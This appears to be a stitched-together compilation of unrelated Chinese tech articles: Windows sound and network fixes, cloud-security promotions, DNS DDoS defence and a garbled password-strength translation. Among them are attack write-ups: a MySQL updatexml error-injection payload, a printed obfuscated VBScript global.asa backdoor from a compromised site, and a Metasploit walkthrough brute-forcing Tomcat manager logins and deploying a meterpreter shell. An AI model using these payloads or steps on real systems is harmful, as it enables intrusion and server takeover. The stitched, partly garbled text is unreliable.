许多用户在使用win7系统的笔记本会遇到话筒没声音的情况，话筒没有声音的话我们在和别人视频聊天或者网上开会等就无法发出声音和其他人沟通了。这应该给大家带来很大困惑，那么要如何解决w7笔记本话筒没声音呢？下面我们就一起来看看win7电脑麦克风没声音怎么解决。 win7话筒没声音的解决步骤： 1、首先右键打开系统托盘下面的声音图标。然后出现一个菜单，点击录音设备选项。 2、然后打开声音的录制标签页，这里就是我们的麦克风的硬件信息显示的地方。如果你发现你的情况如下图一样没有录音设备，则极大的可能是你的误操作给禁用了，或者是因为病毒原因给禁用了。 3、现在你要做的是在此界面空白处点击鼠标右键，然后会出现两个选项，其中一个是显示禁用的设备，就点击一下这个选项。 4、点击之后，会出现所有隐藏的选项，其中就会有一个麦克风，如图所示，显示的是已经停用，当然无法识别声音了。但这并不是坏了。 5、在这个麦克风上面点击鼠标右键，然后出现一个菜单，第一个是启用，点击这个启用选项。 6、点击之后，如图所示，麦克风的图标变成了一个绿色的对号，这说明麦克风的功能已经正常了，而在右边的绿色的部分则是指示标志，你对着麦克风说话，右边这个部位就会有指示。当看到指示时，说明你的麦克风已经正常了。

近日有小伙伴反映说自己的电脑出现了每次开机都要重启路由器才能上网的问题，不知道怎么回事，其实出现这种情况一般是因为你的路由器设置的是动态IP造成的，我们只需要把IP设置成静态的，往往问题就解决了。所以下面为大家整理的就是关于电脑每次开机都要重启路由器才能上网的处理方法。 处理方法： 1、先打开“本地连接”，打开“本地连接”有多种方法，最简单的就是单击屏幕右下角的连接图标。 2、打开后，单击上方的“支持”，记下“IP地址”、“子网掩码”、“默认网关”的具体数值。 3、然后点击上方的“常规”，再点击下方的“属性”，如图所示。 4、在出来的属性框中，选中“Internet 协议（TCP/IP)“，再点击其右下方的“属性”。 5、在出来的属性框中，选中“使用下面的IP地址（S）：”，然后将刚才记下的“IP地址”、“子网掩码”、“默认网关”的具体数值填入里面。 6、然后再单击属性框下方的“确定”。OK，静态IP设置完成。马上可以试试连上网没有，连上后还断不断网。如果不断网了，说明问题解决了。如果还不行，你可以更改下你的IP的最后的一个数值，比如将100改成22、46等等，只要不与其它用户的相同就行。如果还不行，那就可能是受到APR攻击或者路由器质量等的问题了。

调试环境准备：在mysql上创建一张表用于测试 1、updatexml报错注入 updatexml(0,concat('1',(select database())),0)updatexml(目标xml文档名，xml路径，要更新的内容)用于更新xml文档其中xml路径要符合XPATH语法，参见https://www.w3school.com.cn/x...不符合语法的话就会触发xml报错 我们来看下面的实例下面的xpath路径语法是对的，所以是不会有报错的如果xpath语法错误，就会触发sql的xpath报错，sql注入报错的原理就是基于此 接下来我们来尝试一下报错注入下图对database进行了查询我们利用concat构造一个错误的xpath语法，成功爆出来当前数据库的名称，红框处可以是任意不符合xpath语法的值 其他报错注入持续更新中.....

网络安全等级保护2.0标准发布至今已有一年时间，《审查办法》、《定级指南》等相继出台，各行业的等保合规正不断落实。在网络安全建设的过程中，企业如何才能更高效、平稳地通过等保，并将安全能力转化为自身的发展助力？ 近日，腾讯安全联合安全媒体Freebuf、生态合作伙伴深信服共同举办了《产业安全公开课·等保2.0专场》，邀请到腾讯安全等级保护合规服务负责人王余，分享了腾讯如何为网络运营者，特别是腾讯云租户，提供相关的产品、服务、解决方案及最佳实践，助力各行业解决等保合规，实现安全降本增效。 等保2.0的新地位、新理念与新发展 伴随云计算、移动互联网、物联网等技术在各行各业不断渗透，等保2.0在原有技术的标准上，聚焦新问题、新技术和新威胁，通过“安全保护通用要求+新型应用安全扩展要求”的方式，实现了更广的保护对象和保护领域覆盖。 在等保实施方面，大多数企业要达到等保合规要求，参照网络安全运行一般规定框架，从安全管理制度和操作规程、网络攻击和入侵防范、网络运营状态监控与记录，以及数据分类、备份与加密等方面着手优化即可。 此外，等保2.0的落地实施，也为网络安全行业带来了新的增长动力。据赛迪研究数据显示，我国网络安全市场规模2019年约为600亿元，预计2020年可达740.1亿元。从结构来看，相较国外企业，我国网络安全市场在软件和服务上仍有较大提升空间，等保测评咨询服务就是其中之一。 企业关于等保合规的十大困惑解析 1.网络安全法等保规定对于企业而言，意味着责任分担、法律义务与安全建设体系化的要求。一旦发生安全事件，如果没有进行等保测评则，将追究法律责任。 2.等级保护2.0相较1.0，新引入了技术要求，场景和对象更广。在防护要求方面，从过去被动、静态、单点和粗放防护，转化为主动、动态、整体和精准防护。 3.业务系统上云后仍需要过等保。云租户可结合业务需求，考虑云服务商提供的产品解决方案，云服务商和云租户的安全责任划分也有明确规定。 4.等级保护过保流程通常分五步。具体分别是确定定级对象、初步确定等级、专家评审、主管部门审核和公关机关备案。 5.企业可参照等级保护定级指南来确立自身业务系统的等保定级。从业务系统安全和系统服务安全两个方面评价当业务系统被破坏时对客体的影响程度，取两个方面较高的等级。 6.等级保护测评结果及格分数为70分，存在高风险安全问题则直接判为“差”。其中高风险项判定主要包括未建立管理制度、成立领导小组，未进行源代码审查、运维工具检查，以及为制定重要事件的应急预案等。 7.在等保2.0密码合规方面，基于腾讯云数据安全中台全数据生命周期支持，提供一站式数据安全与加密解决方案，满足等保2.0对密码合规应用性的要求。 8.在云主机安全配置方面，腾讯安全云鼎实验室推出了全球首个云原生默认等保合规镜像并免费开放，用户一键即可自动完成基础合规配置。 9.在云上边界安全方面，腾讯云SaaS化防火墙产品，能够为用户提供互联网边界、VPC边界流量的访问控制，集成威胁情报并通过内置的入侵防御系统（IPS）保护用户的云资产和云上业务。 10.在安全运营体系方面，腾讯云安全运营中心贴合等保2.0中对“安全管理中心”相关要求，是客户专有云建设过程中满足等保合规要求的“必备品”。 资深安全专家坐阵 打造等级保护合规一站式服务 在等保咨询方面，腾讯安全集结行业资深的安全专家服务团队，结合腾讯自身业务合规实践，以及10+亿元级大型项目一次性通过等保测评的经验， 为企业客户提供覆盖“测评+咨询+产品+运维”的等保合规一站式服务。 针对关键服务阶段内容，腾讯安全专家服务能够为企业提供更加体系化、标准化的安全防护设计，让整体防护更加协同、高效；并通过技术、流程、人的协同机制形成闭环，在落实等保合规的基础上持续提高安全运营能力。 为助力企业客户顺利通过等保测评，腾讯安全还推出等保2.0套餐包，针对不同等级的过保要求，量身定制打造包含网络安全、终端安全、应用安全、数据安全、安全管理中心等安全能力的“货架”，让企业可以便捷、快速地挑选产品，对自身安全建设查漏补缺。 此次上线的腾讯安全等保2.0套餐包，在满足各类企业之于等保2.0标准的所有需求基础上，还提供了丰富的优惠活动，为企业用户顺利过保提供更高性价比、更贴心全面的解决方案，助力企业高效、平稳、快速通过等保“大考”。

很多使用联想笔记本电脑的用户应该都知道，联想电脑自带的操作系统中包含了联想杀毒软件。但很多用户不太喜欢使用想要将其卸载掉，那联想自带杀毒软件可以卸载吗？我们又该怎么卸载联想的杀毒软件呢？下面就来为大家分享具体的操作步骤。 原因讲解：这个问题是由于联想杀毒的自我保护功能导致的！需要在控制面板的程序和功能中对程序进行卸载即可。 具体操作步骤： 1、在搜索框输入控制面板，打开； 2、右上角查看方式选择“类别”后，选择下发卸载程序打开； 3、找到联想杀毒选择“卸载”； 4、点击卸载按钮； 5、选择“狠心卸载”； 6、卸载完成后 点击完成按钮，根据需求选择“立即重启”或“稍后重启”即可

电脑突然没有声音的情况想必大家都遇到过，特别是在听歌时突然没声音，令人非常反感。这是哪里出现问题了？难道是电脑坏了？其实不是的，电脑声音被禁用也会造成此故障，那么有什么办法解决？解除一下即可，在这和大家分享详细操作步骤。 具体操作步骤： 1、此时可右键单击任务栏的声音图标，选择“声音”。 2、选择播放选择合适的设备作为默认通信设备(此处作为演示，演示设备未使用VIA声卡)设置好默认通信设备后，再打开设备属性(上图右键菜单)： 3、右键点击语音设备的属性（我是点击的扬声器）切换到增强选项卡，将所有增强选项去掉后点击应用应该就可以解决声音禁用的问题了。

原文地址： https://advancedweb.hu/what-i... 原文作者： Tamás Sallai 1. 引言如何选择一个密码，最好的保护您，防止数据泄漏。 2. 密码强度密码强度当然是越多越好，使用现有的密码管理软件，可以快速自动生成和填充任意长度的密码。但是，密码应该是多少位是最佳的，有没有一个合理的下限作为经验法则 下面是一个典型的密码生成器界面: 注意：它的密码长度可以设置8-100位字符3. 数据泄露前，一个好的密码是你所拥有的一切但要理解什么是安全密码，让我们看看另一边发生了什么! 当您创建帐户时，您正在注册的服务将以多种现有密码加密形式之一存储密码。密码直接将其放入数据库，或者使用现有算法对其进行散列。 一些最常用的哈希算法包括 ： MD5SHA-1BcryptScryptArgon2存储散列数据而不是密码本身的好处是，密码不在数据库中。你只需要知道哪些散列数据是你的，而不必知道它具体的值是多少。当您登录时，提供的密码用相同的算法进行散列，如果结果与存储的值匹配，那么您就已经证明了您知道密码。而在数据库被攻破的情况下，密码是不可恢复的。 3.1 密码破解密码破解是攻击者试图逆转哈希函数并从哈希恢复密码。使用一个好的哈希算法，不可能恢复密码，但是尝试各种输入以查看它们是否产生相同的结果是不可能的。如果要找到这样的匹配，则需要从散列中恢复密码。 选择一个好的算法在这里很重要。SHA-1 是为速度而设计的，速度有助于裂解过程。Bcrypt、Scrypt 和 Argon2被设计为以各种方式使裂化尽可能慢的高成本，特别是在专用硬件上，差异是巨大的。 仅考虑速度，无法破解的 SHA-1 散列密码是这样的： 0OVTrv62y2dLJahXjd4FVg81。 使用正确配置的 Argon2 散列的安全密码： Pa$$w0Rd1992。 正如您所看到的，选择正确的哈希算法可以使一个弱密码成为不可破解的密码。 请记住，这仅取决于您要注册的服务的实现方式。 而且，您无法知道实现在哪一部分算法上。 您可以问，但是他们甚至可能不会回应或说他们“认真对待安全性”等类似话术。 您是否相信公司会认真对待密码的安全性，使用良好的哈希算法而不是很糟糕的算法。查看被破坏的数据库列表，尤其是所使用的哈希。 他们中的许多人仍然使用MD5，大多数使用SHA-1，还有一些使用bcrypt。 有些甚至以纯文本形式存储密码。 这里存在一种偏见，因为我们只知道被攻破的数据库使用了什么哈希，而且使用弱算法的公司很可能也未能保护它们的基础设施。但是看看这个列表，我敢肯定您会发现一些您不会想到的熟悉的名称。仅仅因为一家公司看起来规模大、声誉好，并不意味着他们会做正确的事情。 3.2 选择密码作为一个用户，下面的操作对您可能产生多大的影响? 使用纯文本密码，您什么也做不了。如果数据库消失了，您的密码强度并不重要。 使用正确配置的算法，您的密码的安全性也没有多大关系，不考虑 12345 和 asdf 这样的小情况。 但在这两者之间，尤其是SHA-1，你的选择很重要。哈希函数通常不适合密码，但如果使用安全密码，就可以弥补算法的不足。 Hash algoasdfAJnseykp8VjB2qwD7eN3eG4FjkfeksNone---MD5--✓SHA-1--✓Bcrypt-✓*✓Scrypt-✓*✓Argon2-✓*✓这取决于配置。这些散列有不同的移动部分，影响它们的强度，但当正确配置时，它们可以阻止试图破解。 底线：如果你使用的是强密码，那么你比弱密码受到更多的攻击保护。由于您不知道密码存储的安全性如何，所以您无法确定对于给定的服务什么是足够安全的。所以，假设最坏的情况，设置高强度的密码。 3.3 一个密码是不够的我们需要考虑是否使用密码管理器并为每个站点生成唯一的密码。在实际情况中，当一个站点服务被攻破，使用您的已知电子邮箱和密码在其他站点尝试攻击时， 多个密码会使您不会受到密码重用的攻击。 密码重用是非常常见的问题之一，同时也是一个巨大的威胁。 为每个站点生成一个新密码可以避免这种情况。一个数据库被盗，黑客知道数据库内一切内容，为什么还要保护密码？ 原因是，当您不知道数据库已被攻破，而继续使用该服务时。在这种情况下，黑客可以访问您未来在该站点上的所有活动。你可能以后再加一张信用卡，他们还是知道的。强密码意味着他们无法登录您的凭证，并且不能影响您未来的活动。 4. 如何用熵来度量密码强度密码强度都与熵有关，熵是一种表示密码随机性的数值。因为我们处理的是大数，所以与其说有1,099,511,627,776(2的40次方)个不同的变量，倒不如说它有40位的熵。而密码破解的关键在于密码变体的数量，因为密码变体越多，尝试所有可能性所需的时间就越多。 对于由密码管理器生成的随机字符，熵很容易计算：log2（<不同字符数> ^ <长度>）。 ...

你是否遇到过电脑无法联网的问题？一些网友反馈说明明网络是正常的，但就是怎么也连不上网，尝试多种方法都无效，怎么办呢？就此疑问，告诉大家使用360安全卫士解决电脑无法上网的问题，感兴趣的来学习一下。 电脑网络正常但无法上网的解决方法： 1、打开360安全卫士：如下图所示。 2、找到工具“更多”，如图中所示的地方。 3、在新出来的一个界面上选择“断网急救箱”。 4、接着，会出来一个新的断网急救箱的界面。 5、然后，我们点击“全面诊断”，如图中所示。 6、为诊断结果，当有错误出现的时候，他会有，“红色的提示”。 7、然后，我们点击“全面修复”;等待>>> 8、修复完成后，接着，我们就可以正常上网了。

电脑所有窗口的默认颜色是白的，对于长期坐在电脑前办公学习的人而言，容易产生视觉疲劳。为了保护眼睛会通过第三方软件开启护眼模式，其实在电脑中可以直接设置开启的。设置方法很简单，只需使用注册表轻松解决。下面就教大家Win10系统如何开启护眼模式的方法。 具体方法如下： 1、开启创建记事本； 2、将以下内容复制到记事本上： reg add “HKCUControl PanelColors” /v Window /t REG_SZ /d “202 234 206” /f 3、另存为.bat文件。注意保存的时候选择“保存类型”为“所有文件”，扩展名要加“.bat”； 4、保存后双击我们保存的文件即可，程序会一闪而过，再注销重新登陆电脑就行了。

作为一个热爱看丧尸片的女编辑，我曾被多位宅客频道同事吐槽口味很重。 天啦噜，我只是喜欢看丧尸围城这种精彩刺激的情节，哪像有些同事去排队抢过优衣库与KAWS合作T恤，这才是现实版“僵尸大战”好么？ 赛博世界的“另类丧尸临城”也很有意思。一种是喜悦划过嘴角，业务量上涨，尤其如果平台搞了大促，用户一拥而上，这种简称为“人肉版”DDoS。还有一种是正经 DDoS，别想了，就是有人要搞你，比如最常见的游戏业，如果一款游戏爆火，它的安全做得又那么随意，眼红的竞争对手可能要派攻击者来搞一把DDoS。 这类“僵尸大军”会堵在“门口”，不让真正的用户使用业务，或者频繁无效地抢占业务入口，搞瘫系统。可怕的是，发展到现在，黑产已经可以用少量的带宽打出巨量的 DDoS 攻击，轻而易举地把一个系统打趴下。 就像懵懂无知的年代，如果一个男生被欺负，可能会愤愤不平地对方说：放学你别走。然后，找一堆“兄弟”前去助阵。 一般企业平常没有储备对抗上T大流量攻击的能力，但他们想到了一个办法——上公有云，号召五湖四海的“兄弟”，一起抗衡超大流量的攻击。 我们把这种动作称为“云化”。 换了一个环境，安全迎来挑战，很多安全公司提出了自己的解法和产品，甲方爸爸要做的就是捋清楚自己的需求，花钱购买安全产品和服务，像串羊肉一样串好自己买的“武器”，这是一种解法。 另一种解法则是由公有云安全厂商提出，他们的理念是，既然我们提供了最好用的云，我们也要提供最好用的云安全产品和服务，后者的核心是“云原生安全能力”。 知己知彼云的原生安全能力有什么不一样？以占据国内公有云市场大半江山的阿里云为例。 既然强调“原生”，与前一种解法的不同当然是“统一”：统一的身份接入、统一的网络安全连接、统一的主机安全以及统一的整体全局管理。 无论是将军带兵打仗，还是企业安全守卫者与攻击者对阵，最重要的一条兵法就是“知己知彼”。云原生安全能力中的其中三项能力都是为此努力。 第一，了解自己有什么，边界线在哪里，有哪些薄弱点，哪里正在遭受入侵。 云的天然优势是“网络的虚拟化调度能力”，企业可以清晰的看到自己主机东西南北向的流量，统一管理好自身边界安全问题，包括对外的安全边界以及内部资产之间的安全边界，公网资产暴露情况、端口暴露情况，甚至是正遭受攻击的情况一目了然。 第二，如果说第一条是从自身角度出发，我们还需要知道“大局”。 云具备实时的全网威胁情报监测和分析能力，打破单点视线的局限，知道整体环境的“变化”。但这还不够，如果一有风吹草动，士兵就得出动勘察及作出行动，对于现实战争而言，可能还可行，但是对于网络威胁而言，完全行不通，天知道浩如烟海的威胁告警中哪些应该真正值得注意？就算人力可以分析，问题是没有这么多人力可以实时待命，所以从发现威胁到主动防御的自动化响应是一项迫切的要求。 第三，我要知道什么人是我的员工，员工是否正在干权限范围内的事情，但是如果企业内部业务系统太多，怎么办？当企业拥抱云并享用SaaS级服务带来效能的同时，基于云的统一身份管理认证成为关键。 企业安全事件中有接近50%都是员工账户权限问题导致的。基于云的 API 化等原生能力，企业可以对身份权限进行统一的认证和授权，并可以在动态环境中授于不同人不同权限，让任何人在任何时间、任何地点，以正确、安全、便捷的访问正确的资源。 安全的本质是为了保障业务的连续、顺利进行，如果还能提升业务效率，简直就是享受买一送二的增值喜悦。 云原生安全能力的后三项是为“知彼”准备的。 它坚守的第一条准则是，“我知道攻击者一定都是时时存在，并且锲而不舍，所以我要把自己打造得更安全”。将安全下沉到底层硬件与可信环境是一种选择，但是困境依然是：没人没钱，成本高，但是云原生内置的安全芯片就不一样了，公有云厂商将安全芯片的底层硬件能力开放给使用者，并构建可信环境，很简单，不需要用户自己辛苦布人布局，且“众筹”给公有云的成本要低很多。 第二条准则是，“我知道攻击者一定会盯上我最宝贵的数据，我知道它想要这个”。未来随着数据安全、用户隐私数据保护要求越来越高，全链路的数据加密一定是云上企业的最大需求。基于云原生操作系统的加密能力，秘钥由企业自己保管，无论是云服务商、外部攻击者、内部员工没有秘钥都无法看到数据。 第三条准则是，“我知道无论自己怎么预防，攻击者都会来，所以我要比预防还快一步”。在云和互联网模式背景下，业务的频繁调整和上线对业务流程安全提出了更高的要求，从源头上做好安全才能消除隐患。基于云的原生能力，安全可以内置到全流程的设计开发过程中，确保上线即安全。 混合云的需求问题来了，企业上云不是一个一蹴而就的“动作”，而是一个时间跨度比较长的过程。越是大型的企业，历史包袱越重，上云的时间越长。 还有一些企业自己的业务做得好好的，本来没有上云的需要，突然要做一些创新的业务需要上云。 因此，可能出现一个在“公有云”“私有云”“专有云”中排列组合游戏：混合云，也就是说，企业中可能有好几朵云，那么，这与公有云的云原生安全能力所说的“统一”又有什么用，难道能在本地与公有云，或者几朵云中共用一套云安全方案吗？ 有这种解法。 阿里云智能安全总监葛岱斌说，混合云安全方案的形成其实靠用户发展需求或者遭遇的安全事件驱动。 有一家企业用了四朵云，并用专线把四朵云打通，一天，企业发现自己遭遇了蠕虫式病毒，刚开始，他只在阿里云上应用了云安全中心，心想要不也在其他几朵云上部署一下安全中心，看看其他云有没有受到影响，结果发现其他云已经中毒了。 这是第一个需求：能否给四朵云应用同一套安全中心，就像一个有钱业主在四个小区都有房，业主心想：这四套房要是都由同一个物业公司管理，有一样的安保系统就好了。 还有一种需求是，降低运营成本，保证业务的连续性，就像开头提到的“僵尸大军”的故事一样，把本地接口交给公有云，扛住攻击。 但是混合云还有“天然的基因缺陷”：不一样的资源管理、不同的底层架构、不一致的安全工具。 从原生能力落地的化繁为简葛岱斌思考，混合云安全主打的云原生安全能力应该落在四个方面。 采用混合云时，安全的边界变得模糊不清，怎么缩小边界？ 身份成了最小的逻辑边界。 “这时需要一个统一的身份认证，到底有哪些人可以访问应用，如何访问，有哪些应用的权限。以前做法是内外网分属不同系统，我们希望给他一个统一的身份认证体系，不管是外网用户还是内网用户，无论认证源是设在公共云还是在私有云上都可以，只要认证一次就行。”葛岱斌对宅客频道说。 就像现在的有些大学校园没有围墙，但师生进入各类实验室要靠刷卡或刷脸，虚拟环境给了用户一把更强大的“钥匙”：只要认证一次，就被系统记住，更加便利。 除了将身份变成边界，还可以把边界扩大到“无垠”：专有云和私有云不需要有互联网的暴露面，将所有流量入口放在阿里云上，无论是内部员工还是外部用户，访问的都是阿里云的接口，虽然用户和攻击者都不知道流量已经悄悄回到了企业内部的IDC中，暴露面降低，则安全风险降低。 “以前设置一个DMZ区（边界区），所有的流量经过这个DMZ区，但是现在流量全部从阿里云过来，相当于把边界交给了阿里云，阿里云是你的边界，我只要把阿里云的边界做好。”面对潜在的攻击者，葛岱斌祭出“虚晃一招”，企业则从原来“雇了几个保安”转变到将安保工作交给了“安保公司”。 这一招也叫作“统一接口”。 有些用户有自己的机房，后来因为业务需求把一部分业务放到公有云上，还有的用户有几万台分布式的服务器，如果云上有一套安全系统来管理安全，线下服务器的安全怎么管理？几个地方的服务器怎么管理？ 就像前面提到被蠕虫病毒侵蚀的四朵云的用户，服务器的安全其实可以被统一起来，无论线上线下，通通交给云安全中心。还可以把探针部署到其他云平台上做统一的检测，做统一的响应，因为只要所有云的 API 接口也开放了，云安全中心就可以调用 API 做响应。 和想要由同一个物业来管理自己四套房子的房主一样，安全管理也可以统一，不过，有些政企用户的考虑是，大部分资产在线下，只有少部分资产在云上，如果使用统一管理平台，干脆直接将控制台从云上搬到云下也是可选的选项。 “我们想要做的就和整个阿里巴巴的理念一样，让天下没有难做的生意，让天下没有难做的安全运维。”葛岱斌对宅客频道说。 说白了，这一套混合云安全方案的直接目的并不是像安全服务提供商一样做可以挣钱的安全方案，而是让阿里云飘得更远，被云覆盖的用户以更低的成本、更少的专业安全人员、更轻盈的方式获得更大的安全。 天下武功路数纷繁，阿里云安全想做的，是化繁为简，更少地向对手暴露“薄弱面”的同时，打破威胁情报、数据、运维的藩篱，登泰山顶，众山动向一览无遗。 赛博世界如同战场，随时面临威胁，没有人可以做到永远安全，但安全可以更简单。 本文作者：李勤 阅读原文 本文为云栖社区原创内容，未经允许不得转载。

在上个系列《你的DNS服务真的安全么？》里我们介绍了DNS服务器常见的攻击场景，看完后，你是否对ddos攻击忧心重重？本节我们来告诉你，怎么破局！! 首先回顾一下DDoS攻击的原理。DDoS是Distributed Denial of Service的简称，即分布式拒绝服务攻击，其利用处于不同位置的足够数量的僵尸主机产生数目巨大的数据包对一个或多个目标实施DoS攻击，耗尽受害端的网络带宽、系统资源，使受害主机或网络丧失提供正常网络服务的能力。 【传统网络对DDoS攻击的防御】 那传统网络是怎么对DDoS攻击进行安全防御的呢？简单来讲，传统安全技术的防护手段，通常是代替server端来响应client发过来的请求，并通过client的下一步动作有无跟进继续请求，来判断该请求是否来自真实用户。因为如果是肉鸡发起的攻击行为，通常不会再有下一步的动作被匹配到。而如果某个特定的client IP一旦被认定为是真实请求的IP，则该IP会被放入对应的“白名单池”，后续一段时间内，当该IP继续请求时，便会被认为是合法的。可参考如下示意图： 这只是一个简单的原理模拟图，有些在策略上可能不一定适用黑白名单IP list。 【传统权威DNS服务器对DDoS的防御手段】  知道了DDoS的常用防御手段，我们再来说说，对于传统的权威DNS服务器，是怎么防护DDoS攻击的。对于权威DNS而言，默认的请求都是基于UDP，而且DNS协议里面明确说明了DNS服务器可以限制为TCP提供的资源，所以权威DNS的DDoS攻击防御最重要的是如何防住UDP攻击。 但是UDP DDoS防御的最大的问题莫过于UDP没有会话，不能通过包的交互来判断某个请求是否为攻击行为，仅仅查看某个DNS数据报文是不可能区分是否为攻击请求或者真实用户请求的。因此传统安全技术首要地工作就在于需要将缺乏会话交互的UDP一来一回请求转换成为具有会话记录的UDP多来多回请求，它们会利用DNS协议的特点采用如下技术进行防御： 1、CNAME重传 利用DNS的特性，递归请求具有迭代查询一直到获取最终结果的特点，直接代替DNSserver给client返回一个伪造的唯一随机字符串cname域名，并根据该源IP是否继续发起针对该cname域名的请求来判定，该IP是否为正常请求。很显然，如果某个IP马上跟进发起了该cname域名的请求，则该IP是可被信任的；相对地，如果某个IP在规定的超时时间内并没有发起针对该cname域名的请求，则该IP将被判定为攻击者 2、TC重传 利用DNS的特性，在DNS请求client遇到DNS应答flag字段中TC标记为1时必然会发起TCP DNS请求的特点，直接代替DNS server给client返回一个伪造的空应答但该应答flag字段中TC标记为1，并根据该源IP是否继续发起针对该域名的TCP的DNS请求来判定，该IP是否为正常请求。很显然，如果某个IP马上跟进发起了TCP的DNS请求，则该IP是可被信任的；相对地，如果某个IP在规定的超时时间内并没有发起针对的TCP请求，则该IP将被判定为攻击者。  3、首包丢弃 利用DNS的特性，在DNS请求client在超时时间内没有收到DNS应答时会重发该请求的特点，传统安全直接丢弃该首包请求，并根据该源IP是否继续发起针对这个域名的第二次请求来判定，该IP是否为正常请求。很显然，如果某个IP针对性地发起了第二次请求，则该IP是可被信任的；相对地，如果某个IP在规定的超时时间内并没有发起第二次请求，则该IP将被判定为攻击者。 由以上信息我们可以知道，这三种手段其原理都是通过将原来的DNS的UDP一来一回请求转换成为具有会话记录的UDP多来多回请求，并通过判断第二次请求的特点来判定该源IP是否为真实用户访问行为或者攻击行为，并随之进行对应的白名单/黑名单操作。 【传统方案在权威DNS防护中存在的问题】 以上的传统方案是不是就能完全保护我们的权威DNS了呢？其实还是存在一些防护的问题。以下我们总结了权威DNS防护可能遇到的问题： 1、 首先从首包丢弃来讲，这是在权威DNS防御中基本没有被采用的技术，原因主要是递归DNS在遇到权威查询请求被丢弃时会根据SRTT算法另外选择其他的权威服务器，导致传统安全基本上无法收到所谓的“第二次请求”，因此误杀的概率极高。同时权威丢弃递归发过来的查询，会对递归服务器的资源占用造成严重影响，这种情况下递归服务器可能会根据自身保护的策略直接丢弃该域名的正常请求，有可能造成更严重的故障。 2、 其次是TC重传，相对于CNAME重传的策略，TC重传主要的好处在于并没有从数据内容信息上去进行篡改，并没有“伪造”对应的应答；而重大的缺陷在于需要安全服务DNSserver端支持TCP的请求，这个在性能上是非常大的考验，带来的被打瘫的风险反而会进一步加大。另外，有一部分ISP的 LocalDNS根本不支持TCP也是一个重要的问题。 3、 再来谈CNAME重传，前文提到了CNAME重传最大的问题在于“伪造”了一个虚构的应答，正常流程中这个“伪造”的应答只起到中间传递的结果不会有其他方面的影响，但是现实情况中，ISP侧的各种“缓存递归分离”“缓存加速应答”技术都会对正常的流程进行篡改，导致前面提到的这个“伪造”的结果被当成正确的结果直接回给终端用户；更要命地是，ISP侧的DNS各种“优化TTL”的技术还会把这种问题严重放大，最终导致严重的故障。 针对这种问题，最终我们可能看见类似的错误结果： 总结，通过上面针对性的描述，我们大概知道了这些方法用在DNS上都有或多或少的问题。当然，其实还包括一些安全集群DNS会话状态数据一致性、互联网原生丢包带来的黑白名单误杀、伪造IP攻击影响真实IP带来的误杀等各种情况下的误杀，这部分误杀带来的影响也不可小视。 【权威DNS攻击的防护重点】 说了这么多，权威DNS究竟如何防？说真的，DNS系统本身的优异性能非常关键。打铁还需自身硬，还是建议选择一款性能优异的服务器作为权威的DNS服务器。从原理上来讲，传统安全把缺乏会话交互的UDP一来一回请求转换成为具有会话记录的UDP多来多回的策略比起单纯的回复一个DNS应答更耗费计算资源。比如在同样的性能条件资源下，回复一个所谓的“cname应答”或者“tc应答”，还不如直接回复原生的DNS应答，粗略比较下来两者之间耗费CPU指令集并没有什么差别。当然前提最重要的是DNS系统要有卓越的性能，超大的带宽，有能力媲美安全服务器甚至优于安全服务器。阿里云解析DNS具备单机千万级QPS，遍布全球的超大规模集群，具备anycast的架构、依托阿里巴巴大容量、稳定的基础网络，能够轻松抵抗过亿级的DDoS攻击。阿里云解析DNS绝对值得你的信赖。（-->云解析详情页） 本文作者：kimi_nyn 原文链接 本文为云栖社区原创内容，未经允许不得转载。

前言周末的时候，阿里云发来了一条短信，说网站上发现了后门文件，于是赶紧登录阿里云网站，查看该安全事件的相关信息。 后门文件对比出现后门文件的网站，在几个目录下均存在恶意的global.asa文件，用Beyond Compare对这几个文件进行比较后发现内容相同，那只需要分析其中一个文件即可。 后门文件功能先上网查查global.asa文件是干什么用的，在ASP Global.asa 文件这个网页中有介绍，简单来说，就是可以在用户打开网页前，执行其中的代码。 后门文件格式化然后用文本编辑器打开global.asa这个文件，精简后的内容如下： <script language="vbscript" runat="server">sub Application_OnStart:end sub:sub Application_OnEnd:end Sub:Execute(JiaMi("79.110.32.69.")):function JiaMi(asp):ExeCuTe(JMONE("edocpsa=iMaiJ┊txen┊)oah(rhc+edocpsa=edocpsa┊)i(psanaim=oah┊1-)psanaim(dnuoBU ot 0=i rof┊)`.`,psa(tilps=psanaim")):end Function:Function JMONE(objstr):objstr = Replace(objstr, "`", """"):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> "┊" Then NewStr = Mid(objstr, i, 1) & NewStr:Else:NewStr = vbCrLf & NewStr:End If:Next:JMONE = NewStr:End Function</script>开头的内容为 <script language="vbscript" runat="server">，说明其中的代码是用VB这门语言写的，运行在服务器端。 代码中有许多冒号，上网查了一下，在VB中，冒号可以起到和换行符相同的作用。那么把所有的冒号都替换为换行符，并添加必要的缩进，格式化后的代码如下： <script language="vbscript" runat="server">sub Application_OnStartend subsub Application_OnEndend SubExecute(JiaMi("79.110.32.69."))function JiaMi(asp) ExeCuTe( JMONE("edocpsa=iMaiJ┊txen┊)oah(rhc+edocpsa=edocpsa┊)i(psanaim=oah┊1-)psanaim(dnuoBU ot 0=i rof┊)`.`,psa(tilps=psanaim" ) )end FunctionFunction JMONE(objstr) objstr = Replace(objstr, "`", """") For i = 1 To Len(objstr) If Mid(objstr, i, 1) <> "┊" Then NewStr = Mid(objstr, i, 1) & NewStr Else NewStr = vbCrLf & NewStr End If Next JMONE = NewStrEnd Function</script>后门文件分析通过阅读上面格式化之后的代码可以知道，函数Execute调用了函数JiaMi，而函数JiaMi又调用了函数JMONE，这说明关键的部分就是函数JMONE。 ...

实验环境ip 10.1.1.4 端口 8080已打开（tomcat默认开启端口）1、打开metasploit console控制台2、对网段开放了8080端口的主机进行扫描 nmap -sV 10.1.1.0/24 -p 80803、搜索msf关于tomcat可用模块 search tomcat4、使用模块 use auxiliary/scanner/http/tomcat_mgr_login查看配置 show options设置 set rhosts 10.1.1.4执行 run可以获得tomcat的用户名密码 继续使用来getshell use exploit/multi/http/tomcat_mgr_deployshow optionsset username xxxset password xxxset rhost 10.1.1.4set rport 8080run成功后，返回meterpreter shell获取服务器cmdshell

